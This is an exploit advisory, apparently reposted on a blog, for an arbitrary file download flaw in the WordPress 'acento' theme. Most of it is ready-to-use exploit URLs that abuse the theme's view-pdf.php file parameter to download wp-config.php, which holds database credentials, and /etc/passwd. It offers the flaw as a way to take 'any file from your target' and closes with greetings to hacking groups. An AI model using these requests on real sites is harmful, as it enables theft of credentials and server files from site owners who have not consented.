#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++# Title : WordPress acento theme Arbitrary File Download Vulnerability# Author : alieye# vondor : http://www.wpbyexample.com/detail/acentocultural.com# Contact : cseye_ut@yahoo.com# Risk : High# Class: Remote# Date: 01/09/2014#++++++++++++++++++++++++++++++++++++++++++++++++++++++++You can download any file from your target ;)exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.phpDemo:1-download wp-config.php file from site:http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php2-download passwd file from root:http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd#++++++++++++++++++++++++++++++++++++++++++++++++++++++++[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members[#] Thanks To All Iranian Hackers[#] website : http://cseye.vcp.ir/#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Post a Comment
EmoticonClick to see the code!
To insert emoticon you must added at least one space before the code.